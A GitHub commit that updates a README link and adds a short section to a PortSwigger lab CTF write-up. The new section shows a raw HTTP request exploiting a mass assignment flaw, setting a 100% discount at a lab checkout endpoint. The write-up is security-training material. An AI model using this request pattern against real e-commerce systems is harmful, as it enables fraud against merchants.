docs(README): update link to website

Sirius-A · May 16, 2024 · 76f9ce5 · 76f9ce5
1 parent 3fb714a
commit 76f9ce5
Show file tree

Hide file tree

Showing 2 changed files with 12 additions and 1 deletion.
diff --git a/README.md b/README.md
@@ -3,7 +3,7 @@
 A repository to collect my writeups and notes on CTF challenges I did.
 
 
-https://sirius-a.github.io/ctf-writeups/
+https://ctf.zuberfab.io/
 
 
 ## Getting Started

diff --git a/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md b/docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
@@ -17,4 +17,15 @@ Content-Length: 12
 
 ## Exploiting a mass assignment vulnerability
 
+It is possible to send a `POST` request to the `checkout` endpoint with 100% 
+discount.
 
+```
+POST /api/checkout HTTP/2
+Host: 0af0002804d0d47e86ff4f3200e200aa.web-security-academy.net
+Cookie: session=42Y5LbakIMHg3C8i7egh1Kt9P1E6UWD9
+Content-Type: application/json;charset=UTF-8
+[...]
+
+{"chosen_discount":{"percentage": 100},"chosen_products":[{"product_id":"1","name":"Lightweight \"l33t\" Leather Jacket","quantity":1,"item_price":133700}]}
+```